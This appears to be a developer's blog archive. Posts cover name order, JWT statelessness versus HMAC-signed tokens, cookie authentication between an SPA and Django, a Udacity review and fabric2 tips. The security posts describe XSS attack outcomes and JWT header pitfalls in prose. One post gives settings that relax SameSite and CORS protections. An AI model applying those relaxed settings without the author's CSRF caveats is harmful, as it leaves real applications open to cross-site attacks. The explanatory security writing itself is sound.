Lim Yoong Kang

Name order

2021-01-13T00:00:00+00:00

Just a little something about the first name, last name ordering.

In many parts of Asia, it’s more common to use the surname first, and then the given name. That’s obviously different in the West. Sometimes there are historical reasons why the order is flipped only in English, such as Japanese names. There’s an ongoing discussion to change that in Japan, so we can expect even that to change in the future (and in fact, it’s already changing now).

Back when I lived in Asia, it was normal to call me “Lim Yoong Kang”, where “Lim” is my surname, and “Yoong Kang” my given name. However, when I arrived in Australia, for various reasons it made things easier to reverse the order – making it “Yoong Kang Lim”.

At first that was because I filled in some forms, and then most IT systems automatically assigned the default ordering. Later, it became more convenient to just use that order everywhere, otherwise weird things start to happen (like people assuming “Lim” is my given name). After a while I kind of just accepted that, and it became natural.

I told myself it was a far better compromise than, for example, giving myself an Anglicised name so that people don’t bin my resume. No judgement to those who did end up doing that, as it’s a perfectly understandable decision, but it was something I didn’t want to do.

Anyway, long story short, it kind of stuck after a while and I never really felt right about it, although it wasn’t something I worried about too much.

Well, in 2021, I’ve decided to make more of an effort to change that. The Western ordering is simply that, it’s just Western. I’d probably even call it Eurocentric. The assumption that everyone follows that name order in a culturally diverse society like Australia is clearly invalid. So why keep using it? I’ve decided I don’t have to pander to other people, and I especially don’t want to pander to people who ignore these aspects of my culture. It’s my own name, I should get to decide which order is appropriate.

With that said, starting from this blog I want the ordering of my name to better reflect the conventions of my heritage. I’m hoping I could change that in other places too, where practical.

I made the front page of Hacker News

2020-04-12T00:00:00+00:00

Yesterday, someone submitted one of my blog posts from 2018 to Hacker News, the one about my experience dealing with fillable PDF forms.

It made the front page of Hacker News. For a while, it was ranked pretty high:

Just thought that was worth mentioning!

Year 2019 in review

2020-01-30T00:00:00+00:00

It sucked.

Statelessness is not unique to JWTs

2019-12-31T00:00:00+00:00

JSON Web Tokens (JWTs) are commonly used today in a number of applications, especially as bearer tokens.

JWTs are often said to have the advantage of being “stateless”.

By that, it means that it is possible to validate a token without checking any persistent store, like a database or something like Redis. For every authenticated request, we are able to avoid making an extra hit to the database just to validate the user session.

This statelessness is sometimes said to be the main purpose of using JWTs.

In reality, statelessness is a feature that is not unique to JWTs, and I would argue here that it is probably not the best reason to use JWTs if that is the only benefit you get out of it.

Let’s first examine what properties allow JWTs to be stateless, and then discuss if this is indeed the main advantage of JWTs.

JWTs and cryptographic signing

When people talk about “JWTs”, what they usually mean is a variant called JSON Web Signature, or JWS. Another variant is called JSON Web Encryption, which as far as I know is not as commonly used.

As its name implies, the JWS variant uses cryptographic signing. If you are new to cryptography, signing is a way to create something called a “signature”, a bit of data that is impossible to create without a secret key. By checking this signature, we can verify that it was generated by the party holding this secret key.

You can find examples of JWTs online, but a JWT’s structure is basically this:

header.payload.signature

There are three parts, separated by a period. The header and payload are both encoded with URL-safe base64 encoding, which means that anyone can see their contents by decoding them. The last part, the signature, is generated using cryptographic signing.

This signature cannot be generated without knowing the secret, which means that a server can be confident that it was generated by a party that knows this secret. If this was generated using symmetric cryptography, then the same key will be used for both signing and validating the signature. The JWT specification also allows for signing using asymmetric cryptography, which means that it is signed with a private key, and validated with a public key.

It also follows that, in order to validate the token, a server will only need to know the secret key (if using symmetric signing) or the public key (if using asymmetric signing). This means the server does not need to check a database to verify that it is a valid token, allowing JWTs to be “stateless”.

That sounds great, what’s the problem?

In reality, there is nothing about this that is unique to JWTs.

A token can be stateless without it having to be a JWT. It just needs cryptographic signing, the same way JWTs use cryptographic signing.

Essentially, all you need to do is use HMAC with SHA to generate a signature, and send it together with the data serialised in some way (e.g. URL-safe base64 encoding).

In fact, major web frameworks like Django allow you to use stateless tokens. If you configure Django to use cookie-based sessions, you are essentially using stateless signed tokens, only that the token is stored and transported in a cookie. That is why it also comes with a few problems of stateless tokens that JWTs also have, namely the problem of invalidating the tokens. No surprises that Django’s implementation uses HMAC with SHA.

By avoiding JWTs, you also avoid all the problems that come with parsing the header. The JWT header was the source of a number of security issues in the past, specifically that it allowed the client to specify the algorithm that the JWT is signed with, of which “none” is an option. Luckily, this has been fixed in most libraries, but that is still not a great sign.

In my experience, I found that there are other security footguns in the JWT/JOSE specification as well, especially those that come with asymmetric algorithms. For example there are things like the jku claim in the header, that tells you the URL of the public key you should use to validate the token. That is a strange thing to include in the token, because an attacker could generate a token and make the jku claim point to a public key that belongs to the attacker. If the developer naively trusts these built-in claims, then they make their systems vulnerable to these exploits. More information can be found here. The specification, in my opinion, has a number of things that require the developer to know about and guard against.

If the same server or party is both generating and also validating the token, it is probably best to avoid JWTs entirely. Using HMAC and SHA requires very rudimentary cryptography knowledge, has good library support (especially if you use a web framework like Django), and is generally not that easy to mess up.

On top of that, by using HMAC + SHA to generate a token, the token can still be stateless! So, you get all the benefits of statelessness, and none of the disadvantages.

So are JWTs useful at all?

Some would argue that JWTs are not useful, at all. Especially not for session tokens.

I would probably take a softer stance, and say that it can be a viable and pragmatic option in some cases. Note that I do not work in cybersecurity, and this opinion comes solely from the perspective of a developer who builds applications.

One scenario where I would probably use JWTs is if two different servers need to send data to each other, and these two servers are owned by separate organisations. This comes up more often than you would expect.

For example, let’s say I am writing a Python app, and my client has a Java web service. For some reason we need to exchange some data, probably via the user’s browser or mobile app.

By the way, this is a situation similar to OAuth2, where an authorisation server generates a token, which gets sent to a separate resource server that parses that token (OAuth2 commonly uses JWTs, but does not specify a particular token format).

If I use JWTs, I can be fairly confident that my client would be able to decode the JWT using a reasonably mature library.

Since JWT/JOSE is, for better or worse, an established standard by now, I could probably do a lot worse than making my client work with a well-tested JWT/JOSE library. The alternative is to agree with the client to create a token format using an ad hoc serialisation and signing scheme, which can take more development time (both for my client and for myself), and requires a bit of crypto knowledge.

There are more alternatives, of course, like PASETO which was created to address the deficiencies of the JOSE standard. I will not go into those alternatives here.

Can you show me some code to create a stateless token in Django?

Sure. Use the signing module.

Here’s how you do it:

from django.core import signing

data = {'user_id': 123456}

# Here's how you generate a token
token = signing.dumps(data)

# Here's how you validate the token
decoded_data = signing.loads(token, max_age=3600)

If you don’t use Django, find a trusted crypto or HMAC library in your language of choice. In Python you could just use the built-in hmac module. Make sure you compare the signature using a constant-time compare algorithm to prevent timing attacks.

Summary

Statelessness is often touted as an advantage of JWTs, but in reality that feature is not unique to JWTs. Any token that was generated using cryptographic signing can be stateless, including JWTs.

Furthermore, JWTs introduce some extra security burden on the developer, who needs to be extra careful to avoid the pitfalls of JWTs.

If the same party is generating and validating the token, in my opinion it is best to avoid JWTs entirely. A very good option is including a signature of the payload using HMAC + SHA. Django provides this out of the box, and the Python standard library gives you some good tools to use. This gives you stateless tokens without having to use JWTs.

In my personal opinion as a developer (and not a cybersecurity professional), JWTs can be a pragmatic option in some cases where a standard is useful, as this means decent library support which avoids extra development effort. One such case is when the token needs to be generated by one party, and validated by another.

Cookie-based authentication with SPA and Django

2019-12-07T00:00:00+00:00

Disclaimer: I do not work in security, and this article does not make any security recommendations. For advice specific to your situation, please consult a security professional.

A question I see asked a lot is how to implement authentication between an SPA (e.g. React, Vue, etc.) and a Django API.

The two methods that I frequently see in the wild are either token-based authentication, or cookie-based authentication. The terminology is somewhat confusing as tokens are used for both mechanisms, but “token-based authentication” usually refers to manually inserting a token in a header in an AJAX request, whereas “cookie-based authentication” refers to using cookies to send this automatically.

Sometimes you will see some security-focused articles recommending against using token-based authentication, and advocating cookies instead. Unfortunately, there isn’t a lot of up-to-date information on how to actually do this in Django, so I’m hoping that this article will help.

First, I will explain why many articles recommend using cookies over local storage, and also describe some things that most of those articles don’t tell you. Then I will show you how to do cookie-based auth with Django.

What’s the problem with token-based auth?

When people refer to “token-based auth” they mean attaching a token to a header (frequently the Authorization header) manually in an AJAX request. Here’s an example using the axios library:

const token = "someAuthenticationToken";
axios.get("/some_endpoint/", {
    headers: { Authorization: `Bearer: ${token}` }
});

The main objection to this approach is that you will need to store the token somewhere that is accessible using JavaScript. This normally means the browser’s localStorage.

Since you can get the token using JavaScript, if your site is vulnerable to XSS (cross-site scripting), someone can steal that token.

That’s pretty much the main gist of the argument.

Here is an article from Auth0 that recommends against storing tokens in localStorage for the reason I just described.

If you don’t know what XSS is, read the following section, otherwise feel free to skip it.

What’s XSS?

XSS is an exploit where an attacker manages to get malicious JavaScript to run on your browser.

This can happen in a number of ways, and is quite difficult to detect and very easy to miss.

A simple example is if you allow users to submit some text via a form, and you render that text as HTML to other users. Think of something like a message board that allows you to insert HTML in your posts.

Since <script> tags are valid HTML, an attacker could enter in some JavaScript that grabs your localStorage and sends it to some remote server. I’ll leave it to you to find some examples online on how this is done.

How does using cookies help?

The argument normally goes like this:

You can enable a setting called HttpOnly on session cookies. It’s a confusing name, but HttpOnly means your browser will only send the cookie automatically only on HTTP requests, and it is not accessible via JavaScript. So in the event that XSS occurs, an attacker would not be able to steal your token directly.

Cookies don’t protect you against XSS

Unfortunately, many articles stop there, and in my opinion readers may get the wrong impression that if you use cookies you’re safe if XSS happens.

You are NOT protected against XSS if you use cookies.

If I were an attacker, and I can run malicious JavaScript on your browser while you’re logged in, then I can pretty much do anything you can do on your browser. Since the cookies will be sent automatically with each request, I don’t even have to know your token to make authenticated requests. This is equivalent to finding someone’s laptop with an open tab where the owner forgot to log out.

In fact, tokens can expire (and they usually do have a short expiry time) or be invalidated, so stealing a token that may be expired by the time I gets my hands on it may not be very useful. It’s more desirable to make your browser do things for me, while you’re still logged in.

For example, I can make an authenticated request on your behalf to change your email address to mine. I can then initiate a password reset, which will send the password reset link to my email address where I can change your password.

Or, if I only cared about your data, I could just do a GET request to the APIs and send the response data off somewhere.

Or, I could run a malicious script to manipulate the DOM and render a form that asks you to re-enter your password, and have that form send the password to me. If you re-use your passwords in other sites, then now all of your accounts online are vulnerable.

Does that mean it doesn’t really matter where I put the token?

That is a decision you will need to make yourself by considering all factors, including risk, as well as other security measures you put in place, e.g. CAPTCHA, OTP code to phone before certain changes, password re-entry, etc.

If you have other protections in place, you may determine that the choice does not make a huge difference.

However, I will not make a security recommendation, because I am not a security professional.

For a more nuanced discussion about this, I can point you to an article about this called Web Storage: the lesser evil for session tokens from an actual security researcher.

I can say, however – hopefully without much controversy – that if a cookie has the HttpOnly and Secure settings turned on, then storing the token in the cookie is probably not more vulnerable than storing it in localStorage, assuming the appropriate CSRF protections are put in place. Using a cookie gives you additional protection against the token being accessed directly by JavaScript.

For that reason, I would normally prefer using a cookie, with the appropriate CSRF protections.

Read on to find out how to do this in various circumstances.

Do I need to serve the SPA using Django templates in order to use cookies?

No, you do not.

But if that’s your deployment setup, then you don’t have to do anything else. Django handles this out of the box.

How do I use cookies if my SPA and Django are deployed separately?

Your browser doesn’t know or care how your SPA and backend are deployed. It only knows the domain of where it’s making requests to.

It is possible to serve your Django and your SPA from the same domain, and this is the setup I would recommend for most applications. One way is to use nginx or reverse proxy to proxy requests to the right place based on the path of the request.

If you use nginx, you would be doing something like this (just for illustration, you should be using SSL in your own deployment):

server {
    listen 80;
    server_domain example.com

    location /api/ {
        include proxy_params
        proxy_pass http://unix:/tmp/gunicorn.sock;
    }

    location / {
        root /path/to/spa;
    }
}

If you use Netlify to serve your SPA, you could also write some redirect/proxy rules.

This might be tricky if you happen to have path conflicts, but you can get over that by namespacing the URLs for the Django API, e.g. by having all requests to paths starting with /api/ go to Django.

You’ll also need to set your CSRF cookie somehow, or your request to login will fail. Since your page is being rendered by your SPA rather than Django, your CSRF cookie (or any other cookies that Django cares about) wouldn’t be set in the beginning. To get around this, you need to make an initial request to an endpoint which will set the cookie.

If you set up the proxy correctly, then you can basically have some backend code that looks like this (for illustration only, this isn’t production-ready code):

import json
from django.contrib.auth import authenticate, login
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import ensure_csrf_cookie
from django.http import JsonResponse


@ensure_csrf_cookie
def set_csrf_token(request):
    """
    This will be `/api/set-csrf-cookie/` on `urls.py`
    """
    return JsonResponse({"details": "CSRF cookie set"})


@require_POST
def login_view(request):
    """
    This will be `/api/login/` on `urls.py`
    """
    data = json.loads(request.body)
    username = data.get('username')
    password = data.get('password')
    if username is None or password is None:
        return JsonResponse({
            "errors": {
                "__all__": "Please enter both username and password"
            }
        }, status=400)
    user = authenticate(username=username, password=password)
    if user is not None:
        login(request, user)
        return JsonResponse({"detail": "Success"})
    return JsonResponse(
        {"detail": "Invalid credentials"},
        status=400,
    )

Then from your frontend, you can write some functions like this:

const loginRequest = async (username, password) => {
    try {
        await axios.post(
            '/api/login/',
            { username, password },
            { headers: { X-CSRFToken: getCsrfToken(), Content-Type: "application/json" } }
        );
    } catch (error) {
        // handle error here
    }
}

const setCsrf = async () => {
    await axios.get('/api/set-csrf-cookie/');
}

You’re pretty much done at this point.

What if my SPA and Django are on different domains?

You’ll need to relax quite a few security settings, and it’s quite complicated so I’d strongly advise not doing this.

In this case, I’d lean towards using a token in the request header. It’s far less complicated, and not as easy to screw up.

But if you can’t avoid it… read on.

What’s being described here is a setup I see sometimes (actually pretty often) where the SPA and the API are on different domains.

Often they are subdomains, e.g. api.example.com for the API and app.example.com for the SPA. But sometimes they are also on completely different domains.

There are a number of things you need to do to get cross-domain requests to work with cookies.

Use the correct CORS settings

Browsers have a security feature called the same-origin policy that blocks cross-domain requests by default. But you are able to relax this security feature by enabling something called CORS (Cross-Origin Resource Sharing).

To enable CORS, you will need to configure your server to return a number of headers that suit your needs.

To enable cross-domain requests at all, the server will need to return this header:

Access-Control-Allow-Origin: https://app.example.com

It is extremely vital that you whitelist only the domains you trust, otherwise you leave yourself vulnerable.

For cookies to be sent cross-domain, you will also need to enable this header:

Access-Control-Allow-Credentials: true

Many Django applications use a library called django-cors-headers. If that’s what you’re using, please refer to the documentation to enable the two headers.

You could also have nginx return those headers, which is probably a little better.

Turn off the `SameSite` setting

If you use cookies, you will need to care about something called CSRF (cross-site request forgery). Most likely you already have had experience with this by attaching {% csrf_token %} to your forms, if you use Django.

A CSRF attack is when someone manages to get you to make a POST request from a different origin, e.g. by making you fill in a form in a different domain that targets your app’s domain, or an AJAX request. Since cookies are sent automatically, this means you will end up making an authenticated request, which you didn’t intend.

Kind of like what you’re trying to do with this deployment setup, except maliciously.

A very recent addition to cookies is a setting called SameSite, with the purpose of preventing some CSRF attacks. As its name implies, it’s a cookie that won’t be sent in cross-domain requests.

Starting from Django 2.1, session cookies and CSRF cookies have this setting turned on by default.

Prior to version 2.1, Django relied on a CSRF token to protect against CSRF attacks. The way this works is that in POST requests, the browser needs to send a CSRF token through either one of two methods – either together with a form submission (that’s why you have to put {% csrf_token %} in your forms), or in a header (X-CSRFToken by default) for Ajax requests (you grab the token from a non-HttpOnly cookie).

Actually, Django still does this as some old browsers may not support SameSite cookies yet.

In the case where the SPA and the Django API are on different domains, you cannot have the SameSite setting enabled for your session cookies and CSRF cookies. So you’ll need to add these two settings to your settings.py file:

SESSION_COOKIE_SAMESITE = None
CSRF_COOKIE_SAMESITE = None

EDIT (Aug 2020): Starting Django 3.1 you’ll need to use the string ‘None’, see: https://docs.djangoproject.com/en/3.1/ref/settings/#csrf-cookie-samesite

You’ll also need to explicitly tell Django to trust CSRF tokens sent from your SPA’s domain using the CSRF_TRUSTED_ORIGINS setting:

CSRF_TRUSTED_ORIGINS = ["app.example.com"]

It’s always important that you validate CSRF tokens when using cookies, and if you use these configurations it is even more crucial, as you can no longer rely on the SameSite behaviour of cookies.

If you use Django REST Framework, APIView and ViewSet will use the csrf_exempt decorator, meaning CSRF protections are being bypassed by default (because you might not be using cookies).

You will need to configure your viewsets to use the SessionAuthentication backend, which will enable CSRF protections.

Use `withCredentials` when making AJAX requests

By default, cookies are not sent (or set) for cross-domain requests (regardless of CORS settings).

You’ll need to explicitly tell your request to send cookies via the withCredentials property, e.g:

axios
    .get("https://api.example.com/some_resource/", { withCredentials: true })
    .then(console.log)
    .catch(console.log);

Summary

In this article, I discussed why cookies, specifically HttpOnly cookies, are often recommended for session tokens over saving tokens in local storage.

I explained that using cookies doesn’t mean that your application is protected against XSS. However, it does mean that someone can’t steal your session token directly.

I then discussed three deployment options, and how cookies work in each one:

SPA served via Django templates, where no action is needed
SPA and Django API on the same domain, which requires a small amount of code in the frontend to set a CSRF cookie as this is no longer done automatically.
SPA and Django API on different domains, which requires relaxing a number of security settings (CORS, SameSite).

I will hopefully update this post with an actual example repo once I have the time to do it.

If you have any questions or corrections about this post, please feel free to send me an email. I’d love to hear about what you’re doing.

Just completed Udacity’s Data Engineering Nanodegree!

2019-10-16T00:00:00+00:00

So, this happened recently:

Having previously completed the Machine Learning Engineer Nanodegree back in 2018, I’ve now completed 2 nanodegrees from Udacity.

Thanks again to my employer Airteam for sponsoring this, and continually investing in my education and professional development.

I want to talk a little bit about my experiences with the course, and what I’ve learned.

Course structure

First, let’s talk a bit about how the course is structured.

I was part of the first cohort to sign up for this course, which at the time was still a term-based structure. That means, there was a fixed term of about 5 months, and if you don’t complete all the projects, you basically don’t get the certificate (which is probably useless to me anyway).

Udacity has since converted all Nanodegrees to subscription-based courses, where you pay a certain amount of money each month, and can take as long as you’d like.

There are 5 modules, and in each one of them you are required to submit between 1-2 guided projects. Your submission will be reviewed by a contractor hired by Udacity.

The projects are mostly done in the browser, and could be a Jupyter workspace, or a customised workspace on what I believe is a Docker container.

The 5 modules are:

1. Data Modeling

This module is an introduction to databases, and covers Postgres and Apache Cassandra. Basically one relational database, and one NoSQL database. There was a basic project for each database, so two projects in total.

2. Cloud Data Warehouses

An introduction to data warehousing, specifically on AWS. It talked about why transactional and analytical databases require different designs. The specific technology used for the data warehouse is Amazon Redshift. In the project, we did ETL from a data source to create a star schema database in Redshift.

3. Spark and Data Lakes

As the name probably tells you, it’s an introduction to Apache Spark, and also how to build a Data Lake using Spark. The project uses the same schema as the previous module.

4. Data Pipelines with Airflow

Basically, an introduction to Apache Airflow, and how you can use it to create data pipelines. You basically rebuild the cloud data warehouse project using Airflow, with some minor changes to leverage Airflow.

5. Capstone Project

In this module, you do an open-ended project using either Udacity-provided data sources, or you could find your own datasets. You complete a writeup, and submit it.

Student and peer experience

For my cohort, we were invited into a shared Slack workspace with other students and our assigned mentors. Each mentor is assigned to a small group of students.

Unfortunately, they’ve since moved newer students to Student Hub, which is essentially a worse version of Slack.

Quality of video lectures

Just for context, I’d previously done the machine learning nanodegree as mentioned, and in that nanodegree I experienced some of the best and clearest instruction I’ve ever received in my life through the video lectures.

Unfortunately, the Data Engineering Nanodegree’s lectures were a bit of a letdown this time, and in my opinion not of their usual quality (at least not of the quality of the machine learning nanodegree). The lectures were not very polished, had very little post-editing, and not rehearsed.

The course instructors who appeared in the videos appear to not be Udacity employees, but rather external “subject matter experts” contracted to record videos on the course content.

That in itself is not usually a problem, and Udacity has done that successfully in the past.

The problem is that the videos didn’t appear to have gone through much QA after being recorded, and there appeared to be a lack of preparation that went in to record these videos.

A specific example is numerous instances in the videos where a course instructor stumbles on sentences and repeats the sentence again, probably expecting the video to be edited appropriately.

The worst parts were the data warehousing and data lakes section, where the instructor appeared to be thinking of what to say on the fly. There were numerous pauses, long “uhhhs” and “ummms” which got REALLY annoying after a while because once you notice it you can’t unhear it. I had to put the videos on 2x speed, and even then it was barely tolerable.

If I might offer a suggestion to improve the video lectures: It would be MUCH better if course instructors were to prepare a script, and to read from that script in the videos. This isn’t theatre or acting class – it’s fine to read from a script, and is far better than just winging it during recording.

It wasn’t uniformly bad though, the Airflow and Spark sections actually were of their usual polished quality in my opinion. It’s likely that those lectures were either rehearsed or read from a prepared script, judging by the lack of “uhhs” and “umms”, and any stumbling. Any mistakes were probably edited out.

Quality of course content

The course has a substantial practical bent, rather than focusing on theory and motivation. The course is an excellent choice if you want to learn “how” to do things like ETL and Data Warehousing, on cloud providers like AWS.

I felt it was probably slightly thin on the “why” side of some things. So if you don’t have any experience at all working with databases, it’s possible you might get a little bit confused during the course.

Specifically, I wished there was more treatment on what the consumers of data engineering (like BI analysts or data scientists) expect and how they use the solutions we build.

I personally think that was fine, and you will probably get the most value out of this course if you do have a background working with databases.

For a deeper treatment of this, it’s probably better to read from a book anyway. I think one of the instructors recommended one from Kimball and Ross, which I’m planning to get.

Quality of the projects

All of the projects (except the capstone) were based on the same problem domain (a song streaming startup), with the same data, using the same schema.

So it’s just a matter of doing the same thing, using different tools. The difficulty of that is highly dependent on how good you are at learning a new API.

As an experienced developer, once I understood what was expected in the project, I could finish the project in under 2 hours.

But I think most people on the course Slack agreed that the project instructions were quite confusing. Often, I was confused myself at some of the instructions.

The project reviews were sometimes helpful, but often it was pretty pedantic, and your submission may get rejected for things like forgetting to delete a code comment in the Jupyter notebook cells.

For context, there were comments in the provided workspaces that were meant to mark sections to show where you’re meant to put in code, e.g. # TODO: complete section here. Deleting the comments did absolutely nothing to help me understand data engineering, but the submission will get rejected if you don’t do it. I felt like it was a bit of a waste of time.

Some projects can also take a long time to run due to the amount of data, so if you’re doing it in the Udacity-provided workspace, it can go to sleep before it’s complete. My suggestion to avoid that is, don’t use the whole dataset. Work on a smaller dataset, verify it works, then replace the code with the full dataset BUT DON’T RUN IT. Just submit it as it is.

Mentoring

This is one aspect that I can’t comment on, because I didn’t make use of it. I didn’t actually want any mentoring, but mentoring was pushed onto me. Actually the mentors were hired from a pool of people who have completed other nanodegrees in the past. Which means I received an invitation to apply too, but I didn’t have the time for that.

So there’s a chance you get someone who has done a nanodegree, but isn’t really experienced as a data engineer.

The specific mentor I was assigned to lives in a different timezone and the time difference was quite unfortunate.

At one point I fell behind in the course due to illness. So, what happened is that every Sunday night, between 1am and 3am I would get pinged by my mentor asking “how’s progress” (despite my local time being on my Slack profile), and some basic advice on how to use AWS.

I was stupid enough to forget to turn off notifications on Slack, so that meant a few sleepy Mondays until I finally asked my mentor to stop, and that while I appreciate the advice about AWS, I’m probably going to be fine because I happen to use AWS for a living.

However, many people on Slack reported that they benefited from their mentor, including the mentor I was assigned to, so your mileage may vary.

Verdict

There were a few problems with the course, and reviews online (especially on Reddit) haven’t been very kind. It’s true that the course felt like it was done in a rush, and it does show. There were also some issues like the content not being complete at launch time, and course content was added later (which didn’t affect me because I was slow anyway).

But I did learn a few things, and that’s what matters in the end.

Would I recommend the course? When I enrolled, the price of the course was $1300. That’s less than half the current price.

At the current price point of $2669 for 5 months access (and a monthly fee after), I personally wouldn’t recommend it, unless you happen to have a lot of money. It’s extremely expensive for what you get.

You’re definitely not going to get a job in data engineering with only this nanodegree, but it’s marketed like it’s a pathway to a data engineering career. Sorry, but it’s not. But it’s a good complement if you already have relevant work experience, probably with cloud platforms like AWS and some database experience.

Although I learned a lot from their courses, I doubt I will do another nanodegree, unless I suddenly start earning a lot more money (in which case I’ll attempt the self driving car one).

txtimg – A library for text-based images

2019-09-19T00:00:00+00:00

Recently, I’ve been doing some translation work for a certain community on the internet. As far as I’m aware of, the community mostly lives on Twitter, and a few other niche forums.

Anyway, sometimes the translations can get pretty long, e.g. a radio or a TV broadcast.

That means, a tweetstorm would be really hard to read.

The solution people usually come up with is to write the translations in a word processor, and take screenshots of the file. So the result is something we call a “text-based image”.

I don’t really use a word processor much, and I hate taking screenshots like that. My tool of choice is a text editor like VSCode, but that looks really terrible when you take a screenshot.

Also, I’ve been toying with the idea of distributing my translations via a web service. Some translations I do aren’t of publicly available content, so the idea is to deliver the translations to only people who have paid for this exclusive content. With a web service, I could also invite other translators to the provide translations.

So I wrote some Python code! I released a library called txtimg!

You can install it like this:

$ pip install txtimg

And here’s how you use it:

from txtimg import TxtImg

text = """
What did Sushi A say to Sushi B?

What's up B? (WASABI)
"""

t = TxtImg()
img = t.generate_from_text(text)
img.save("wasabi.png")

This is basically a thin wrapper on top of the Pillow library. Basically you can pass in a string, and it will return a Pillow image object. There are some configuration parameters that I probably should have put more thought into, but it works.

In hindsight, I could have also just used pandoc but that might be complicated to install on a server. Or it was probably just LaTeX that was difficult to install, I can’t remember.

I’m planning to add more features to this depending on how it goes with my translating thing.

If you want to see my code repo, you can find it here: https://github.com/yoongkang/txtimg

SyDjango August 2019

2019-08-22T00:00:00+00:00

After a lengthy hiatus, SyDjango came back on August 2019!

The event was co-sponsored and co-organised by Airteam and Cover Genius. Artem and the rest of the fine people at Cover Genius have very kindly taken care of a lot of the logistics for this meetup. Many thanks to Artem and everyone at Cover Genius for their help.

It was a great night of fantastic talks! Many thanks to our speakers, Iqbal Bhatti, Amit Saha, and Sam Scheding for giving really great talks.

I apologise for having to leave early, as I had a flight to Melbourne very early in the morning the next day.

We have already booked the venue for our October and November meetups. We are of course looking for speakers again! Please let me or Artem know if you are interested in giving a talk. To get in contact with us, we would encourage you to join our Slack channel. You can join using this form here: https://sydjango.herokuapp.com. Please excuse the crappy design, I should really change that. Alternatively you could just email me.

We now also have an official Twitter account, follow us there to get any general updates: https://twitter.com/sydjango

Of course, please also reach out if you have any questions about the meetup.

Tutorials suck

2019-08-16T00:00:00+00:00

If you do any programming at all, you’ve done some tutorials.

They suck.

Maybe that’s a little harsh. More accurately, I mean that the value you get from tutorials is almost always somewhat limited unless it solves the exact situation you’re in. I’ve never done a tutorial that significantly increased my understanding.

I think in theory it’s possible to write a tutorial that doesn’t suck, but all the ones I’ve used disappointed me in one way or another.

A tutorial is like a cooking recipe, and unless you’re trying to cook the exact thing in the recipe, it’s not very helpful for much else. The recipe could tell you the steps, but often doesn’t succeed in telling you why the steps are there, how they can be applied to other dishes. If you’re lucky they tell you which steps are optional, or ingredients that can be substituted with something else.

It’s much the same with tutorials. Just a series of steps, which you follow mechanically but don’t understand. I don’t know if it’s the format of tutorials that makes it hard to explain things in detail, or if we as a profession have not figured out the best way to write a tutorial.

Let me give an example. Recently, I’ve had to write some C# on .NET for some reason. I don’t usually work with this technology, and this was a one-off project. I really did not want to install .NET on my Mac.

So I thought I’d use Docker. Go ahead and google “Docker C# .NET”, and one of the top results is this tutorial from Microsoft.

Now, I think this is a useful tutorial, and looks very well written. I don’t want to single out this tutorial as one that sucks. And I certainly don’t want to bash the authors.

It’s just that it didn’t tell me what I needed.

The tutorial starts off by… telling me to install .NET on my Mac, and then running a command to create the project. This was the exact thing I was trying to avoid! Why do I need to install .NET on my host computer when I could use a perfectly good .NET Docker container, whose image the tutorial says I’ll have to pull anyway?

I tried looking for other tutorials, and they all started with the same steps. No results for “generate .NET project using Docker”. Urgh.

Luckily I knew a little bit about Docker and knew that I could run commands on a container using e.g. docker-compose run service dotnet new console. I also knew about volumes, and if I used them, any files I generated from those commands would also be in my host machine. That gave me what I needed.

Sometimes, as in this case, you won’t find a single tutorial that tells you what you need. Instead, you figure this out by having some random facts floating around in your head and somehow connecting the dots.

That’s why I don’t envy anyone starting out programming. It’s completely insane how much know-how that is necessary to do your job is either undocumented, or documented poorly. Often what you really need is buried deep in some obscure part of the docs, and often scattered too.

Which is a shame, because often our first instinct would be to reach out to tutorials.

We either need to write better tutorials, or find some better format.

My fabric deployment script (fabric2)

2019-04-18T00:00:00+00:00

Since 2018, there’s been a new version of fabric, also known as fabric2.

It comes with an updated API, and is incompatible with the old fabric 1.x fabfiles.

It’s also split up some functionality into a few different libraries, including invoke and patchwork.

There was a rant on Reddit about the changes that the new version introduced.

I chimed in with some of my own complaints, which were mainly due to what I believed was inadequate documentation.

After that I regretted it. It wasn’t very nice to the developers who obviously put in a lot of work to release the new version, and obviously it wasn’t very productive either.

So instead of just complaining, I decided to make a blog post that would actually help the community and encourage more people to use it.

My confusion with the documentation

As mentioned, some functionality was split out into several other libraries. That means you’ll need to look at the documentation for each library separately.

For example, anything to do with CLI and task running that isn’t “strictly SSH” is now in a library called Invoke.

So if you’re used to the old primary API of fabric which was to define a task, then run it in the command line using fab <task-name>, then you probably want to be looking at the documentation for invoke. Fabric has a thin wrapper on top of invoke for tasks, and Fabric’s documentation simply refers you to Invoke.

Unfortunately, there were a few things that took me way too long to figure out.

Chief among them is how fabric and invoke work together. For example, a lot of fabric’s documentation deals with using Connection objects:

from fabric.connection import Connection

connection = Connection("username@remote-ip")

print(connection.run("ls"))

If you’re used to some of the old fabric methods like cd(), well, you can’t find them in the Connection object. What you get is run() and not much else.

But when I look at invoke’s documentation, they clearly have methods like cd() on an object passed in as the first argument in a task. This is called a Context object.

For example here’s an invoke task:

from invoke import task

@task
def some_task(c):
    with c.cd("some-directory"):
        c.run("ls")

Well, that’s what I need. But that’s a Context object, not a fabric Connection object.

What’s a Context object?

Looking at the “Getting Started” documentation, it first says (emphasis mine):

Defining and running task functions

The core use case for Invoke is setting up a collection of task functions and executing them. This is pretty easy – all you need is to make a file called tasks.py importing the task decorator and decorating one or more functions. You will also need to add an arbitrarily-named context argument (convention is to use c, ctx or context) as the first positional arg. Don’t worry about using this context parameter yet.

Okay. Eventually they’ll explain what it is, right?

Sure enough, if you scroll down you see this bit:

Aside: what exactly is this ‘context’ arg anyway?

A common problem task runners face is transmission of “global” data - values loaded from configuration files or other configuration vectors, given via CLI flags, generated in ‘setup’ tasks, etc.

Some libraries (such as Fabric 1.x) implement this via module-level attributes, which makes testing difficult and error prone, limits concurrency, and increases implementation complexity.

Invoke encapsulates state in explicit Context objects, handed to tasks when they execute . The context is the primary API endpoint, offering methods which honor the current state (such as Context.run) as well as access to that state itself.

Maybe I’m unfamiliar with task runners in general, but I don’t really understand what these paragraphs mean.

Let’s try some stuff out and see if it works

So I decided to try and play around with the Context. The convention is to use c as its name, and a fabric Connection also starts with a c.

Could I just pass the Connection object into a task….?

from fabric import Connection
from fabric.tasks import task

@task
def sub_task(c):
    with c.cd("some-folder"):
        c.run("ls")

@task
def main_task(c):
    con = Connection("username@some-host")
    print(sub_task(con))

I’ll be damned, that actually worked!

That seems like a pretty important detail about using fabric, and fundamental in using fabric and invoke together – but it was really strange that it wasn’t documented anywhere. I had to discover it more or less by accident!

So if you’re curious where the cd() method went, the way to do it is to pass your Connection object into a task.

